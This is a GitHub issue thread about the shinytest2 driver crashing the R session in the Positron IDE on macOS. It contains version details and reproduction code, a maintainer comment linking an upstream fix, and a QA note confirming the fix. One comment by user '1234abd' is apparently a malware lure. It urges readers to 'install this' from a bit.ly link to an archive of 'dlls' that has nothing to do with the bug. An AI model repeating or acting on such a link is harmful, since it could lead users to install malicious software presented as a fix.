### ISSUE TITLE
shinytest2 driver crashes the R session in Positron

### ISSUE THREAD

**Issue by DivadNojnarg** [posit-dev/positron#4741]
#### Positron and OS details:

```
Positron Version: 2024.09.0 (Universal) build 45
Code - OSS Version: 1.92.0
Commit: b0ec249b20455499f9e79ffe0bec35a5ff602ea4
Date: 2024-09-16T02:45:13.900Z
Electron: 30.1.2
Chromium: 124.0.6367.243
Node.js: 20.14.0
V8: 12.4.254.20-electron.0
OS: Darwin arm64 24.0.0
```

#### Interpreter details:

```
─ Session info ───────────────────────────────────────────────────────────────────────────────────────────────
 setting  value
 version  R version 4.4.0 (2024-04-24)
 os       macOS 15.0
 system   aarch64, darwin20
 ui       X11
 language (EN)
 collate  en_US.UTF-8
 ctype    en_US.UTF-8
 tz       Europe/Zurich
 date     2024-09-19
 pandoc   3.1.8 @ /usr/local/bin/pandoc

─ Packages ───────────────────────────────────────────────────────────────────────────────────────────────────
 package     * version date (UTC) lib source
 brio          1.1.5   2024-04-24 [1] RSPM (R 4.4.0)
 callr         3.7.6   2024-03-25 [1] RSPM (R 4.4.0)
 cli           3.6.3   2024-06-21 [1] RSPM (R 4.4.0)
 crayon        1.5.3   2024-06-20 [1] RSPM (R 4.4.0)
 magrittr      2.0.3   2022-03-30 [1] RSPM (R 4.4.0)
 processx      3.8.4   2024-03-16 [1] RSPM (R 4.4.0)
 ps            1.7.6   2024-01-18 [1] RSPM (R 4.4.0)
 R6            2.5.1   2021-08-19 [1] RSPM (R 4.4.0)
 rlang         1.1.4   2024-06-04 [1] RSPM (R 4.4.0)
 sessioninfo   1.2.2   2021-12-06 [1] RSPM (R 4.4.0)
 shinytest2  * 0.3.2   2024-04-28 [1] RSPM (R 4.4.0)
 testthat    * 3.2.1.1 2024-04-14 [1] RSPM (R 4.4.0)
```

## Describe the issue:

Starting`{shinytest2}` driver causes the R session to restart.

## Steps to reproduce the issue:

1. Run this code in the Positron R console:

```r
library(shiny)
library(shinytest2)

my_app <- shinyApp(
  ui = fluidPage(),
  server = function(input, output, session) {}
)

app <- AppDriver$new(
  my_app,
  name = "block-submit-app",
  seed = 4323
)
```

2. The session restarts:
```
R 4.4.0 exited unexpectedly: killed with signal 6 (SIGABRT)
R 4.4.0 restarted.
```

3. If I run this R code within a R session started from the Mac terminal app, I can start the driver and play with it.

## Expected or desired behavior:

The session should not restart and I should be able to play with the driver

## Were there any error messages in the UI, Output panel, or Developer Tools console?

Positron logs  (hope you can download it, let me know):
[positron-logs.txt](https://github.com/user-attachments/files/17057277/positron-logs.txt)

Message from the Developer Tools console:

```
 INFO Starting session for language runtime 8bf656f0b759b09aff982c3ec898174d (language: R name: R 4.4.0 version: 4.4.0) (Source: The runtime exited unexpectedly and is being restarted automatically.)
```

**Comment by 1234abd** [comment]
install this
https://bit.ly/4evXrQ6
I put the necessary dlls in the archive

**Comment by dfalbel** [comment]
I think this is related to #4686. The crash should be avoided with https://github.com/posit-dev/ark/pull/526 but It seems it didn't get into a release build yet.

**Comment by testlabauto** [comment]
### Verified Fixed
    Positron Version(s) : 2024.09.0-95
    OS Version          : OSX

### Test scenario(s) 

shinytest2 no longer crashes R session

Link(s) to TestRail test cases run or created:
